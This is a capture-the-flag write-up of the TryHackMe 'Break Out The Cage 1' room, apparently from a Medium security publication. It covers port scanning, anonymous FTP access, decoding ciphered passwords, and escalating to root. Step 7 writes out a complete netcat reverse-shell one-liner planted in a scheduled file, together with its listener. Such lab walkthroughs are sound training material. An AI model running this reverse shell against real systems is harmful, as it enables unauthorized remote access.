InfoSec Write-ups – Medium–
No need to wait; connect to your OpenVPN network and join the room.
Task 1 Investigate!
- After deploying the machine, you will get your machine IP in one min. Let us start by scanning the machine through Nmap.
nmap -sV -sC -A <machine_ip>
2. Let’s search for hidden extensions in HTTP through Gobuster Tool.
gobuster dir -u http://<machine_ip> -w <wordlist>
3. Since nothing can be found in the HTTP server, let us open the FTP server and login as anonymous.
4. We can see a file called “dad_tasks” with a string that looks encoded. After many different tries, I was able to decode the string using CyberChef. First, with base64 and then with Vigenere cipher. Then finally, we will get Weston’s password.
5. Successfully we got the shell as weston.
6. There is a Dotfile in /opt directory, which suspicious. Let’s check that
7. At a specific time interval, we get a few messages from cage. And those quotes are stored in the .quotes file. We can remove all those quotes and add a reverse shell script to it.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <system_ip> 1234 >/tmp/f' > .quotes
8. Simultaneously we have to listen through Netcat in one more terminal.
nc -lvp 1234
Successfully we got the reverse shell, and the user is cage.
9. ‘Super_Duper_Checklist’ contains the user flag.
10. In the ‘email_backup’ folder, there are three emails. The third email gives us a note which looks encrypted.
11. The encrypted message can be decoded in CyberChef through Vignenere Decode. The key is ‘face’ because, in that email, it was highlighted. After cracking, we will get the password for root.
12. Changing the user to root.
su root
13. The root directory contains two email backups in it. The second email contains the root flag.
Boom!!! We have completed the room.
It was fun doing this challenge. I hope everyone learned something new:).
Get connected with me through Linkedin and My Website.
TryHackMe: Break Out The Cage 1 Write-up was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
Hacker's Directory 